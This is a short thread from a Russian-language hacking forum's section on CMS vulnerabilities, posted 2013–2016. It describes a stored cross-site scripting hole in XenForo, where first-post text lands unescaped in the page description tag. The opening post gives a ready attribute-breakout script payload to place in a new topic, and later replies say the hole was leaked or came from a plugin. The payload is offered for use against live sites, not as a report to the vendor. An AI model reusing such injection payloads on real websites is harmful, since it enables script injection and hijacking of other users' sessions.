1. Теперь за форумную активность начисляются биткоины и другие криптоденьги. Подробнее.
    Скрыть объявление
  2. Появилась архивная версия форума arhiv.xaker.name, где собраны темы с 2007 по 2012 год.
    Скрыть объявление

Xss в Xenforo

Тема в разделе "Уязвимости популярных CMS", создана пользователем Хулиган, 4 дек 2013.

  1. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    Суть:
    хреньфоро пихает в description все что есть в 1 посте
    пользуясь этим

    создаем топик - в тело куда нибудь или под спойлер пихаем

    [noparse]
    Код:
     '><''>"><script>alert(/hooligan/)</script> \"> 
    [/noparse]
    профит
    [​IMG]
     
    4 дек 2013
  2. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    242
    слито
     
    17 фев 2014
  3. 06shurik
    06shurik Новичок
    Симпатии:
    0
    на версии 1.2.4 не выскочило сообщение. есть другие варианты ?
    или что то не так делал? подскажите подробней, скрипт был съеден, в посте он не появлялся, потом как раскручивать эту xss ??
     
    4 май 2014
  4. v1nest
    v1nest Выёбистый СМ ^^ Команда форума Глобальный модератор
    Симпатии:
    52
    Тут видимо в дырявом плагине было дело.
     
    28 май 2016

Поделиться этой страницей

Загрузка...